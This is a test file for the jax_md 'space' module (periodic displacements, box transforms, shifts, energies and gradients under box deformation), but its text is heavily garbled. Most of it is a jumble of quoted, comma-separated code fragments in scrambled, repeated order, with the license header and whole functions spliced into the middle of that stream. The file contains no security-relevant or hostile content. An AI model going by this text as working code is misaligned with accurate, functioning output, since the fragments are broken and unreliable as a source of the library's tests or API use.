# You may obtain a copy of the License", "self.assertAllClose( shift_fn(R, dR, box=T_1), jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "@parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in", "grad_indirect = grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn", "dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1", "= jnp.array(size_0 * (eye + dtransform_0), dtype=dtype) size_1 = 10.0", "* box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) disp_fn,", "jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3: for", "} for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key =", "= jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list(", "= random.PRNGKey(0) displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric", "spatial_dimension), dtype=dtype) T = eye + dT + jnp.transpose(dT) R", "[f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in BOX_FORMATS", "s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key =", "R displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False)", "R, box, (s, E), (s_gf, E_gf), (s_g, E_g) = \\", "k in range(-1, 2): dR_shifted = dR + jnp.array([i, j,", "true_disp_fn, true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key", "from jax.config import config as jax_config from jax import random", "(spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1),", "= space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype ==", "R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled,", "> 0) and jnp.all(unwrapped_R < 1)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement = space.map_product(displacement) for", "= random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split = random.split(key)", "grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype,", "POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) 
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Tests for jax_md.space."""

from absl.testing import absltest
from absl.testing import parameterized

from jax.config import config as jax_config
from jax import random
import jax.numpy as jnp

from jax import grad, jit, jacfwd
from jax import test_util as jtu

from jax_md import space, test_util, quantity, energy
from jax_md.util import *

from functools import partial
from unittest import SkipTest

test_util.update_test_tolerance(5e-5, 5e-13)

jax_config.parse_flags_with_absl()
jax_config.enable_omnistaging()
FLAGS = jax_config.FLAGS

PARTICLE_COUNT = 10
STOCHASTIC_SAMPLES = 10
SHIFT_STEPS = 10
SPATIAL_DIMENSION = [2, 3]
BOX_FORMATS = ['scalar', 'vector', 'matrix']

if FLAGS.jax_enable_x64:
  POSITION_DTYPE = [f32, f64]
else:
  POSITION_DTYPE = [f32]


def make_periodic_general_test_system(N, dim, dtype, box_format):
  assert box_format in BOX_FORMATS

  box_size = quantity.box_size_at_number_density(N, 1.0, dim)
  box = dtype(box_size)
  if box_format == 'vector':
    box = jnp.array(jnp.ones(dim) * box_size, dtype)
  elif box_format == 'matrix':
    box = jnp.array(jnp.eye(dim) * box_size, dtype)

  d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else box)
  d_gf, s_gf = space.periodic_general(box)
  d_g, s_g = space.periodic_general(box, fractional_coordinates=False)

  key = random.PRNGKey(0)

  R_f = random.uniform(key, (N, dim), dtype=dtype)
  R = space.transform(box, R_f)

  E = jit(energy.soft_sphere_pair(d))
  E_gf = jit(energy.soft_sphere_pair(d_gf))
  E_g = jit(energy.soft_sphere_pair(d_g))

  return R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)
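# Note (ours, illustrative; not part of the original suite): the periodic
# general space stores positions as fractional coordinates R_f in [0, 1)^dim
# unless fractional_coordinates=False, and real positions are recovered by
# applying the affine box transformation, R = space.transform(box, R_f).
# The helper name below is hypothetical, added only to make the convention
# concrete.
def _fractional_to_real_example():
  box = 4.0 * jnp.eye(2)          # a 2d box of side length 4.0
  R_f = jnp.array([[0.25, 0.5]])  # one particle, fractional coordinates
  # transform computes einsum('ij,kj->ki', box, R_f): here [[1.0, 2.0]].
  return space.transform(box, R_f)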
#", "T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T)", "def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N", "the License is distributed on an \"AS IS\" BASIS, #", "f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key, split_R,", "random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye +", "transform = jnp.diag(box_size) R = random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted,", "jax.numpy as jnp from jax import grad, jit, jacfwd from", "jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2: for i", "lambda R: jnp.sum(R ** 2) energy_indirect = lambda T, R:", "for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key =", "+ (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct", "self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "law or agreed to in writing, software # distributed under", "grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf))", "box, (s, E), (s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name", "T, R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list(", "for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3)", "test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "< dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype", "range(SHIFT_STEPS): key, split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT,", "dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact =", "if box_format == 'matrix' else box) d_gf, s_gf = space.periodic_general(box)", "may obtain a copy of the License at # #", "test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9", "grad, jit, jacfwd from jax import test_util as jtu from", "split_t, split_R, split_dR = random.split(key, 4) size_0 = 10.0 *", "is f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key,", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in BOX_FORMATS))", "split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype)", "may not use this file except in compliance with the", 
"s_g(R, grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new)", "dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct", "R), dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( {", "E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box))", "space, test_util, quantity, energy from jax_md.util import * from functools", "this file except in compliance with the License. # You", "test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key,", "spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R))", "import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT", "range(-1, 2): dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype)", "# # Licensed under the Apache License, Version 2.0 (the", "in range(-1, 2): dR_shifted = dR + jnp.array([i, j, k],", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype is f32: tol", "spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension),", "space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension),", "= jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted <", "dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key", "= random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.sqrt(f32(0.1)) *", "= random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if", "space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( {", "general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype", "new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension,", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( {", "or implied. 
# See the License for the specific language", "dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "split_dR = random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ())", "box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R), grad(E_g)(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "+ dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype)", "as jax_config from jax import random import jax.numpy as jnp", "split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR = random.split(key,", "dim, dtype, box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N,", "POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 *", "general_disp_fn(R, R)) assert disp_fn(R_scaled, R_scaled).dtype == dtype self.assertAllClose( shift_fn(R_scaled, dR),", "()) dtransform_0 = 0.5 * random.normal( split_T0_dT, (spatial_dimension, spatial_dimension)) T_0", "disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn)", "= [2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64:", "for jax_md.space.\"\"\" from absl.testing import absltest from absl.testing import parameterized", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format):", "f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1,", "def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R = random.uniform(", "= random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R", "dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct)", "displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R <", "jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "j], dtype=R.dtype) dr_shifted = space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape +", "dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted < dr_direct, dr_shifted, dr_direct)", "def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn = space.map_product(disp_fn)", "E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E), (s_gf,", "= space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric =", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self,", "self.assertAllClose(dR_wrapped, dR_direct) 
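  # Note (ours): space.inverse returns the matrix inverse of the box
  # transformation, so composing the two transforms round-trips positions:
  #   T_inv = space.inverse(T)
  #   space.transform(T_inv, space.transform(T, R))  # ~= R, up to tol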
  @parameterized.named_parameters(jtu.cases_from_list(
      {
          'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
          'spatial_dimension': dim,
          'dtype': dtype
      } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
  def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype):
    key = random.PRNGKey(0)
    displacement, _ = space.periodic_general(jnp.eye(spatial_dimension))
    metric = space.metric(displacement)
    test_metric = space.canonicalize_displacement_or_metric(displacement)

    metric = space.map_product(metric)
    test_metric = space.map_product(test_metric)

    for _ in range(STOCHASTIC_SAMPLES):
      key, split1, split2 = random.split(key, 3)

      R = random.normal(
          split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)

      self.assertAllClose(metric(R, R), test_metric(R, R))

  @parameterized.named_parameters(jtu.cases_from_list(
      {
          'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),
          'spatial_dimension': dim,
          'dtype': dtype
      } for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE))
  def test_periodic_displacement(self, spatial_dimension, dtype):
    key = random.PRNGKey(0)

    for _ in range(STOCHASTIC_SAMPLES):
      key, split = random.split(key)

      R = random.uniform(
          split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)
      dR = space.map_product(space.pairwise_displacement)(R, R)

      dR_wrapped = space.periodic_displacement(f32(1.0), dR)

      dR_direct = dR
      dr_direct = space.distance(dR)
      dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,))

      if spatial_dimension == 2:
        for i in range(-1, 2):
          for j in range(-1, 2):
            dR_shifted = dR + jnp.array([i, j], dtype=R.dtype)

            dr_shifted = space.distance(dR_shifted)
            dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))

            dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct)
            dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct)
      elif spatial_dimension == 3:
        for i in range(-1, 2):
          for j in range(-1, 2):
            for k in range(-1, 2):
              dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype)

              dr_shifted = space.distance(dR_shifted)
              dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,))

              dR_direct = jnp.where(
                  dr_shifted < dr_direct, dR_shifted, dR_direct)
              dr_direct = jnp.where(
                  dr_shifted < dr_direct, dr_shifted, dr_direct)

      dR_direct = jnp.array(dR_direct, dtype=dR.dtype)
      assert dR_wrapped.dtype == dtype
      self.assertAllClose(dR_wrapped, dR_direct)
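  # Note (ours): the brute-force reference above enumerates every image
  # shift in {-1, 0, 1}^dim of the unit box and keeps the displacement of
  # smallest norm, i.e. the minimum-image convention;
  # space.periodic_displacement(f32(1.0), dR) must reproduce it exactly.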
"BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if", "1e-13 if dtype is f32: tol = 1e-5 for _", "2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled),", "dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact", "from jax import random import jax.numpy as jnp from jax", "in range(-1, 2): for j in range(-1, 2): dR_shifted =", "3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T =", "in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R =", "'scalar': raise SkipTest('Scalar case fails due to JAX Issue #5849.')", "'dtype': dtype, } for dim in SPATIAL_DIMENSION for dtype in", "in range(STOCHASTIC_SAMPLES): key, split = random.split(key) R = random.uniform( split,", "assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after =", "dr_shifted < dr_direct, dr_shifted, dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert", "# Copyright 2019 Google LLC # # Licensed under the", "# distributed under the License is distributed on an \"AS", "# Unless required by applicable law or agreed to in", "dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime = space.transform(T,", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list(", "random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct = lambda", "random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R =", "= jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype): key =", "dtype=dtype) T = eye + dT + jnp.transpose(dT) R =", "= unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not", "absltest from absl.testing import parameterized from jax.config import config as", "spatial_dimension, dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol", "the Apache License, Version 2.0 (the \"License\"); # you may", "space.map_product(metric) test_metric = space.map_product(test_metric) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "limitations under the License. 
\"\"\"Tests for jax_md.space.\"\"\" from absl.testing import", "dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype)", "SkipTest('Scalar case fails due to JAX Issue #5849.') N =", "dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f, box=deformed_box), E_g(R,", "POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format", "dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION for dtype", "space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn =", "random.split(key, 3) dT = random.normal( split_T, (spatial_dimension, spatial_dimension), dtype=dtype) T", "'matrix': box = jnp.array(jnp.eye(dim) * box_size, dtype) d, s =", "split2, split3 = random.split(key, 4) max_box_size = f32(10.0) box_size =", "R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R,", "R: jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect =", "= R unwrapped_R = R displacement, shift = space.periodic_general(T) _,", "(spatial_dimension, spatial_dimension), dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T,", "def test_periodic_displacement(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in", "box_format) R_new = s(R, grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new", "def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "import absltest from absl.testing import parameterized from jax.config import config", "10 SPATIAL_DIMENSION = [2, 3] BOX_FORMATS = ['scalar', 'vector', 'matrix']", "== 'matrix' else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g", "R * box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype)) self.assertAllClose( shift_fn(R,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype,", "if spatial_dimension == 2: for i in range(-1, 2): for", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension, dtype):", "import grad, jit, jacfwd from jax import test_util as jtu", "from functools import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13)", "dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION", "disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform) disp_fn =", "i in range(-1, 2): for j in range(-1, 2): dR_shifted", "= 16 R_f, R, box, (s, E), (s_gf, E_gf), (s_g,", "under the License is distributed on an \"AS IS\" BASIS,", "= space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g", "'_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim in", "space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension ==", "dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif", "general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': 
dim,", "'vector': box = jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format ==", "PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION", "'_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype } for dim in", "random import jax.numpy as jnp from jax import grad, jit,", "E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "wrapped=False) displacement = space.map_product(displacement) for _ in range(SHIFT_STEPS): key, split", "= ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32, f64]", "in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size)", "jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted < dr_direct,", "\\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return E_g(R,", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype): key", "jnp.sum(space.transform(T, R) ** 2) grad_direct = grad(energy_direct)(R_prime) grad_indirect = grad(energy_indirect,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype,", "def test_transform(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _ in", "= jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box) if", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self, spatial_dimension, dtype):", "box_format == 'scalar': raise SkipTest('Scalar case fails due to JAX", "> 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert dR_after.dtype", "split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension),", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype, box_format):", "def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES):", "dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct)", "= space.map_product(general_disp_fn) grad_fn = grad(lambda R: jnp.sum(disp_fn(R, R) ** 2))", "= R * box_size dR = random.normal( split3, (PARTICLE_COUNT, spatial_dimension),", "jax.config import config as jax_config from jax import random import", "ANY KIND, either express or implied. # See the License", "box=deformed_box), E_g(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "3) key, split_t, split_R, split_dR = random.split(key, 4) size_0 =", "random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R),", "the License. 
# You may obtain a copy of the", "= random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size *", "in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol", "dtype=dtype) R_prime = space.transform(T, R) self.assertAllClose(R_prime_exact, R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "random.split(key, 4) max_box_size = f32(10.0) box_size = max_box_size * random.uniform(", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format):", "# See the License for the specific language governing permissions", "= lambda T, R: jnp.sum(space.transform(T, R) ** 2) grad_direct =", "key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split =", "= random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R) energy_direct =", "dR) * box_size) assert shift_fn(R_scaled, dR).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( {", "box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension':", "key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES):", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_displacement(self, spatial_dimension,", "quantity.box_size_at_number_density(N, 